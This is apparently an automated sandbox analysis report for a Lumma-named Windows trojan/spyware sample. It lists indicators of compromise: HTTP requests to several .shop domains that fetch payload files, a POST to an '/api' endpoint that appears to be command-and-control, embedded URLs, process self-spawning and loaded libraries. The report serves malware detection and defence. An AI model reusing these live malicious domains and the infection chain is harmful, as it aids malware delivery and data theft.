Source: global traffic	HTTP traffic detected: GET /iqqhm.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: u1.grapplereturnunstamped.shopConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop

Source: global traffic	DNS traffic detected: DNS query: u1.grapplereturnunstamped.shop
Source: global traffic	DNS traffic detected: DNS query: burnressert.shop
Source: global traffic	DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: cegu.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: burnressert.shop

Source: lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lumma_phothockey.exe	String found in binary or memory: http://www.red-gate.com/products/dotnet-development/smartassembly/?utm_source=smartassemblyui&utm_me
Source: lumma_phothockey.exe	String found in binary or memory: http://www.smartassembly.com/webservices/Reporting/
Source: lumma_phothockey.exe	String found in binary or memory: http://www.smartassembly.com/webservices/Reporting/UploadReport2
Source: lumma_phothockey.exe	String found in binary or memory: http://www.smartassembly.com/webservices/Reporting/UploadReport2v
Source: lumma_phothockey.exe	String found in binary or memory: http://www.smartassembly.com/webservices/UploadReportLogin/
Source: lumma_phothockey.exe	String found in binary or memory: http://www.smartassembly.com/webservices/UploadReportLogin/GetServerURL
Source: lumma_phothockey.exe, 00000004.00000002.3761226860.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://burnressert.shop/
Source: lumma_phothockey.exe, 00000004.00000002.3761226860.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://burnressert.shop/IZ?
Source: lumma_phothockey.exe, 00000004.00000002.3760852223.0000000000817000.00000004.00000020.00020000.00000000.sdmp, lumma_phothockey.exe, 00000004.00000002.3760586379.00000000007B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://burnressert.shop/api
Source: lumma_phothockey.exe, 00000004.00000002.3761226860.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://burnressert.shop/api(w
Source: lumma_phothockey.exe, 00000004.00000002.3760379544.0000000000797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://burnressert.shop:443/api
Source: lumma_phothockey.exe, 00000004.00000002.3760379544.0000000000797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://burnressert.shop:443/apical
Source: lumma_phothockey.exe, 00000004.00000002.3760908997.0000000000823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/
Source: lumma_phothockey.exe, 00000004.00000002.3760908997.0000000000823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/&g
Source: lumma_phothockey.exe, 00000004.00000002.3760908997.0000000000823000.00000004.00000020.00020000.00000000.sdmp, lumma_phothockey.exe, 00000004.00000002.3760586379.00000000007B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txt
Source: lumma_phothockey.exe, 00000004.00000002.3759966173.00000000001DB000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txtebKit/537.36
Source: lumma_phothockey.exe, 00000004.00000002.3760908997.0000000000823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/8574262446/ph.txtnge
Source: lumma_phothockey.exe, 00000004.00000002.3760908997.0000000000823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop/g
Source: lumma_phothockey.exe, 00000004.00000002.3760379544.0000000000797000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cegu.shop:443/8574262446/ph.txt
Source: lumma_phothockey.exe, 00000004.00000002.3761035787.0000000000839000.00000004.00000020.00020000.00000000.sdmp, lumma_phothockey.exe, 00000004.00000002.3761226860.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000004.00000002.3760586379.00000000007BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dfgh.online/invoker.php?compName=
Source: lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: lumma_phothockey.exe, 00000004.00000002.3760908997.0000000000823000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipgonuh.shop/int_clp_sha.txt
Source: lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp, lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://u1.grapplereturnunstamped.shop
Source: lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://u1.grapplereturnunstamped.shop/iqqhm.dat

Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 59975 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59965 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59965
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59956
Source: unknown	Network traffic detected: HTTP traffic on port 59984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59984
Source: unknown	Network traffic detected: HTTP traffic on port 59956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856

Source: unknown	HTTPS traffic detected: 172.67.215.98:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.7:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.7:49836 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.7:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.7:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.7:49865 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.7:59956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.7:59965 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.67.165:443 -> 192.168.2.7:59975 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.7:59984 version: TLS 1.2

Source: C:\Users\user\Desktop\lumma_phothockey.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_064DEC68 NtProtectVirtualMemory,	0_2_064DEC68
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_064DEC62 NtProtectVirtualMemory,	0_2_064DEC62
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_06572670 NtResumeThread,	0_2_06572670
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_06572668 NtResumeThread,	0_2_06572668

Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_02DBED10	0_2_02DBED10
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_02DBB118	0_2_02DBB118
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_02DBB10E	0_2_02DBB10E
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_02DBB698	0_2_02DBB698
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_02DBB6A8	0_2_02DBB6A8
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_064DB628	0_2_064DB628
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_064D65D0	0_2_064D65D0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_064DB618	0_2_064DB618
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_064D65C1	0_2_064D65C1
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_06626B58	0_2_06626B58
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_06621190	0_2_06621190
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_06626B47	0_2_06626B47
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0724AED8	0_2_0724AED8
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0724D098	0_2_0724D098
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_07242668	0_2_07242668
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072812C0	0_2_072812C0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072815E7	0_2_072815E7
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072828C8	0_2_072828C8
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072A19A3	0_2_072A19A3
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072A0040	0_2_072A0040
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072A3D32	0_2_072A3D32
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072AED02	0_2_072AED02
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072AED10	0_2_072AED10
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072A3D77	0_2_072A3D77
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072A3D88	0_2_072A3D88
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072A89A0	0_2_072A89A0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072A8990	0_2_072A8990
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_072A001F	0_2_072A001F
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_07366F50	0_2_07366F50
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_07366F42	0_2_07366F42
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_07369578	0_2_07369578
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0736956A	0_2_0736956A
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0736CC70	0_2_0736CC70
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_0736C900	0_2_0736C900
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_07363109	0_2_07363109
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_073671B0	0_2_073671B0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_073671A0	0_2_073671A0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_07360006	0_2_07360006
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_07368068	0_2_07368068
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_07368040	0_2_07368040
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 0_2_07360040	0_2_07360040
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_004220B0	4_2_004220B0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0044A140	4_2_0044A140
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00431380	4_2_00431380
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00418750	4_2_00418750
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00419770	4_2_00419770
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00451810	4_2_00451810
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0043D9A2	4_2_0043D9A2
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0041DA68	4_2_0041DA68
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00437C70	4_2_00437C70
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00450ED0	4_2_00450ED0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0042F040	4_2_0042F040
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0043E063	4_2_0043E063
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0043F0D4	4_2_0043F0D4
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00416150	4_2_00416150
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0042B10E	4_2_0042B10E
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_004261DE	4_2_004261DE
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00414250	4_2_00414250
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00451270	4_2_00451270
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00443200	4_2_00443200
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0044835F	4_2_0044835F
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00419300	4_2_00419300
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0042D300	4_2_0042D300
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0044B310	4_2_0044B310
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_004173C0	4_2_004173C0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0042738A	4_2_0042738A
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00434392	4_2_00434392
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00424460	4_2_00424460
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0042B412	4_2_0042B412
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0042C560	4_2_0042C560
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00430560	4_2_00430560
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00443560	4_2_00443560
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00451560	4_2_00451560
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0043D530	4_2_0043D530
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0042A5DB	4_2_0042A5DB
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_004165E0	4_2_004165E0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0042D590	4_2_0042D590
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00449770	4_2_00449770
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_004287C1	4_2_004287C1
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0042E840	4_2_0042E840
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00415860	4_2_00415860
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0044D870	4_2_0044D870
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00442826	4_2_00442826
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_004268F9	4_2_004268F9
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_004138A0	4_2_004138A0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0042C8B0	4_2_0042C8B0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_004499D0	4_2_004499D0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0043A9E0	4_2_0043A9E0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00418A70	4_2_00418A70
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00440AC5	4_2_00440AC5
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00412AD0	4_2_00412AD0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00431AB0	4_2_00431AB0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0041AB40	4_2_0041AB40
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00428B02	4_2_00428B02
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00414B80	4_2_00414B80
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0041EB80	4_2_0041EB80
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00418C50	4_2_00418C50
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00450C00	4_2_00450C00
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0042ACC3	4_2_0042ACC3
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0042BCC0	4_2_0042BCC0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00421CF1	4_2_00421CF1
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0043FC80	4_2_0043FC80
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00441D51	4_2_00441D51
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0044AD90	4_2_0044AD90
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00438DAC	4_2_00438DAC
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00415DB0	4_2_00415DB0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00442E1D	4_2_00442E1D
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0042CE30	4_2_0042CE30
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00443E8A	4_2_00443E8A
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00412E90	4_2_00412E90
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_0041EF20	4_2_0041EF20
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00431FA0	4_2_00431FA0
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: 4_2_00428FB0	4_2_00428FB0

Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: String function: 00417FF0 appears 77 times
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Code function: String function: 00424450 appears 110 times

Source: lumma_phothockey.exe, 00000000.00000002.1578962491.00000000073F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs lumma_phothockey.exe
Source: lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004235000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSiidcaqz.dll" vs lumma_phothockey.exe
Source: lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004550000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs lumma_phothockey.exe
Source: lumma_phothockey.exe, 00000000.00000002.1550328158.000000000119E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs lumma_phothockey.exe
Source: lumma_phothockey.exe, 00000000.00000002.1575625497.0000000006500000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs lumma_phothockey.exe
Source: lumma_phothockey.exe, 00000000.00000002.1552607329.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs lumma_phothockey.exe
Source: lumma_phothockey.exe, 00000000.00000000.1292239919.0000000000C56000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamediumh.exe, vs lumma_phothockey.exe
Source: lumma_phothockey.exe, 00000000.00000002.1565730061.0000000003F67000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs lumma_phothockey.exe
Source: lumma_phothockey.exe, 00000000.00000002.1577103994.0000000007090000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSiidcaqz.dll" vs lumma_phothockey.exe
Source: lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs lumma_phothockey.exe
Source: lumma_phothockey.exe, 00000000.00000002.1565730061.0000000004643000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs lumma_phothockey.exe
Source: lumma_phothockey.exe	Binary or memory string: OriginalFilenamediumh.exe, vs lumma_phothockey.exe

Source: lumma_phothockey.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@4/3

Source: C:\Users\user\Desktop\lumma_phothockey.exe

Mutant created: NULL

Source: lumma_phothockey.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: lumma_phothockey.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\lumma_phothockey.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: lumma_phothockey.exe	Virustotal: Detection: 15%
Source: lumma_phothockey.exe	ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Users\user\Desktop\lumma_phothockey.exe "C:\Users\user\Desktop\lumma_phothockey.exe"
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process created: C:\Users\user\Desktop\lumma_phothockey.exe "C:\Users\user\Desktop\lumma_phothockey.exe"
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Process created: C:\Users\user\Desktop\lumma_phothockey.exe "C:\Users\user\Desktop\lumma_phothockey.exe"	Jump to behavior

Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\lumma_phothockey.exe	Section loaded: windows.storage.dll	Jump to behavior
